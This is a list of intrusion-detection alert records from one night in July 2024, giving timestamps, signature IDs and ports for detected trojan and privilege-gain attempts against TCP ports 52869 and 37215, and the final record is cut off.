                      Timestamp:07/20/24-23:05:57.137886
                      SID:2831300
                      Source Port:58842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.240695
                      SID:2027339
                      Source Port:35092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.224203
                      SID:2027339
                      Source Port:50696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:49380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.620376
                      SID:2025132
                      Source Port:34974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2835222
                      Source Port:40688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.972089
                      SID:2027339
                      Source Port:57580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2829579
                      Source Port:34236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.078658
                      SID:2027339
                      Source Port:42594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2027339
                      Source Port:50344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.159827
                      SID:2025132
                      Source Port:36952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:25.934160
                      SID:2027339
                      Source Port:59078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2027339
                      Source Port:43110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.472881
                      SID:2027339
                      Source Port:50684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.170667
                      SID:2025132
                      Source Port:57672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.277885
                      SID:2027339
                      Source Port:53212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.173548
                      SID:2027339
                      Source Port:44974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.442605
                      SID:2831300
                      Source Port:38332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2831300
                      Source Port:60088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.510455
                      SID:2835222
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.981181
                      SID:2831300
                      Source Port:50838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.440618
                      SID:2831300
                      Source Port:54514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2831300
                      Source Port:33634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2027339
                      Source Port:52640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.368197
                      SID:2831300
                      Source Port:40824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.947686
                      SID:2025132
                      Source Port:46342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2831300
                      Source Port:59862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2027339
                      Source Port:54990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2835222
                      Source Port:42628
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2025132
                      Source Port:34168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2027339
                      Source Port:55590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.068388
                      SID:2025132
                      Source Port:48116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2025132
                      Source Port:37176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.237965
                      SID:2025132
                      Source Port:33250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.452869
                      SID:2025132
                      Source Port:59494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2831300
                      Source Port:47604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.975364
                      SID:2027339
                      Source Port:49298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2829579
                      Source Port:39986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.001304
                      SID:2025132
                      Source Port:36880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.853581
                      SID:2025132
                      Source Port:43132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2025132
                      Source Port:50252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:52362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.428451
                      SID:2025132
                      Source Port:40094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2831300
                      Source Port:51690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.652096
                      SID:2027339
                      Source Port:60844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.543285
                      SID:2027339
                      Source Port:55030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2829579
                      Source Port:53578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2831300
                      Source Port:52460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:39792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.450231
                      SID:2027339
                      Source Port:35802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:35618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.299648
                      SID:2025132
                      Source Port:38074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.320571
                      SID:2027339
                      Source Port:46282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:37146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.648653
                      SID:2025132
                      Source Port:51398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:44230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.592016
                      SID:2831300
                      Source Port:34560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.634552
                      SID:2025132
                      Source Port:41384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.125524
                      SID:2027339
                      Source Port:43998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2025132
                      Source Port:47000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.174884
                      SID:2027339
                      Source Port:51104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:44846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620653
                      SID:2025132
                      Source Port:36596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.188343
                      SID:2027339
                      Source Port:54896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.487816
                      SID:2025132
                      Source Port:53822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:34370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.105390
                      SID:2831300
                      Source Port:43514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2829579
                      Source Port:34108
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.530121
                      SID:2027339
                      Source Port:60458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.416273
                      SID:2027339
                      Source Port:39654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.283236
                      SID:2027339
                      Source Port:57146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.968542
                      SID:2831300
                      Source Port:49938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2831300
                      Source Port:35332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.414252
                      SID:2027339
                      Source Port:44342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.839926
                      SID:2025132
                      Source Port:56962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.246625
                      SID:2025132
                      Source Port:40276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.993750
                      SID:2025132
                      Source Port:50932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.005036
                      SID:2831300
                      Source Port:58300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.522075
                      SID:2027339
                      Source Port:54122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.359417
                      SID:2027339
                      Source Port:53634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.146643
                      SID:2027339
                      Source Port:53722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.445837
                      SID:2027339
                      Source Port:55210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.083178
                      SID:2025132
                      Source Port:33620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.470289
                      SID:2831300
                      Source Port:51004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:51.309417
                      SID:2831300
                      Source Port:49200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2831300
                      Source Port:59202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.607368
                      SID:2027339
                      Source Port:36944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.795331
                      SID:2025132
                      Source Port:56420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.872548
                      SID:2027339
                      Source Port:39570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2831300
                      Source Port:52270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.574335
                      SID:2025132
                      Source Port:46334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2831300
                      Source Port:45614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.411596
                      SID:2027339
                      Source Port:41950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.590112
                      SID:2835222
                      Source Port:46694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.112035
                      SID:2027339
                      Source Port:43230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.090759
                      SID:2025132
                      Source Port:41044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.280683
                      SID:2027339
                      Source Port:39956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:38620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.235921
                      SID:2025132
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.341019
                      SID:2027339
                      Source Port:56954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.193709
                      SID:2027339
                      Source Port:48146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.017539
                      SID:2027339
                      Source Port:59688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.071207
                      SID:2027339
                      Source Port:53362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2027339
                      Source Port:54330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:46556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2831300
                      Source Port:40852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:01.742070
                      SID:2831300
                      Source Port:52032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.744106
                      SID:2025132
                      Source Port:34468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:36.472084
                      SID:2027339
                      Source Port:46330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.534264
                      SID:2025132
                      Source Port:39696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.745204
                      SID:2025132
                      Source Port:33710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.386710
                      SID:2027339
                      Source Port:34548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2027339
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.185144
                      SID:2027339
                      Source Port:53174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.058070
                      SID:2829579
                      Source Port:56232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2027339
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2835222
                      Source Port:36542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2027339
                      Source Port:48264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.851101
                      SID:2025132
                      Source Port:50756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.346978
                      SID:2027339
                      Source Port:39144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.673284
                      SID:2027339
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.432345
                      SID:2027339
                      Source Port:49404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.478141
                      SID:2831300
                      Source Port:34680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2831300
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.443193
                      SID:2831300
                      Source Port:45962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:52160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.812461
                      SID:2025132
                      Source Port:39452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.603267
                      SID:2027339
                      Source Port:34668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.048572
                      SID:2027339
                      Source Port:35882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.439868
                      SID:2025132
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.472907
                      SID:2027339
                      Source Port:38052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.909872
                      SID:2027339
                      Source Port:44802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.787409
                      SID:2025132
                      Source Port:46140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.037609
                      SID:2027339
                      Source Port:56454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.086589
                      SID:2027339
                      Source Port:41100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2835222
                      Source Port:52194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:36262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.910197
                      SID:2027339
                      Source Port:34242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.374653
                      SID:2829579
                      Source Port:51292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.324403
                      SID:2025132
                      Source Port:39016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2831300
                      Source Port:48664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.469321
                      SID:2831300
                      Source Port:44458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:43990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:37402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.472911
                      SID:2027339
                      Source Port:41868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.467011
                      SID:2027339
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2835222
                      Source Port:50558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.132088
                      SID:2831300
                      Source Port:56762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2831300
                      Source Port:54168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.430184
                      SID:2835222
                      Source Port:37022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2831300
                      Source Port:58642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2027339
                      Source Port:54722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.037863
                      SID:2831300
                      Source Port:54284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.583817
                      SID:2027339
                      Source Port:39788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2831300
                      Source Port:50726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.930253
                      SID:2831300
                      Source Port:32924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.639160
                      SID:2025132
                      Source Port:40024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.607616
                      SID:2025132
                      Source Port:36216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.413313
                      SID:2831300
                      Source Port:57136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2829579
                      Source Port:44672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:53498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2829579
                      Source Port:36054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.843007
                      SID:2829579
                      Source Port:52858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.676864
                      SID:2831300
                      Source Port:33834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2027339
                      Source Port:35928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.479448
                      SID:2831300
                      Source Port:47416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.879269
                      SID:2027339
                      Source Port:50494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.234052
                      SID:2025132
                      Source Port:51202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.592228
                      SID:2025132
                      Source Port:44300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:12.667310
                      SID:2025132
                      Source Port:42062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2027339
                      Source Port:41884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2027339
                      Source Port:57568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.271256
                      SID:2831300
                      Source Port:42868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.202225
                      SID:2025132
                      Source Port:55464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:30.636367
                      SID:2027339
                      Source Port:35672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:58326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.576576
                      SID:2025132
                      Source Port:36760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2835222
                      Source Port:51698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:54948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2835222
                      Source Port:42654
